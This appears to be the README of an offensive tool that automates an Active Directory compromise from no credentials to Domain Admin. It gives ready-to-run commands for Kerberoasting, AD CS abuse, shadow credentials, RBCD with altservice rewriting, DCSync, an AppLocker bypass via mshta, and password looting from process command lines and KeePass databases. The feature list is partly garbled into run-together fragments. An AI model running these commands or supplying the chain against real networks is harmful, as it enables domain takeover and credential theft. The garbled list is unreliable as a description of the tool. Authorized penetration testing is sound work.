
Automated Active Directory attack chain from zero-auth to Domain Admin. Chains 25+ techniques including Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync, and Synacktiv 2026 reflection exploits. Authorized pentesting only.
Zero-Auth to Domain Admin — Automated Active Directory Attack Chain
A fully automated penetration testing tool that chains 25+ attack techniques to compromise Active Directory environments. Designed for authorized security assessments.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Zero-Auth to Domain Admin — Attack Chain
Discover | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url files on writable sharesbloodhound-python -c All collection + ZIP analysisWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → ghost-SPN upgrade (CVE-2025-58726)AddKeyCredentialLink → shadow credentials → PKINIT → NT hashGenericAll / WriteAccountRestrictions on Computer → RBCD chain → admin TGS-altservice rewrite, in one phase-altservice$-suffix retry on principal lookup → TGT for Linux user via auto-created <user>$ machine account → GSSAPI SSHGet-CimInstance Win32_Process via nxc -x; regex-greps for passwords in mysql/sqlcmd/runas/KeePass/--password style flags*.kdbx in C:\Users, download via smbclient, keepass2john | hashcat -m 13400# Fully automated — zero-cred chain (auto-discovers everything)
sudo ./ad-autopwn.py
# With credentials — full chain
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC labs (Layer 2 attacks blocked) — auto-discovery still works
sudo ./ad-autopwn.py --no-arp --no-wpad
# Pre-auth credential discovery (lockout-safe)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound graph collection + automatic high-value analysis
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT for 'root' via auto-created root$ machine acct
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD chain — full ghost-SPN + RBCD + altservice rewrite, one shot
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker bypass
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Dry run (print every command, run nothing — even background processes)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1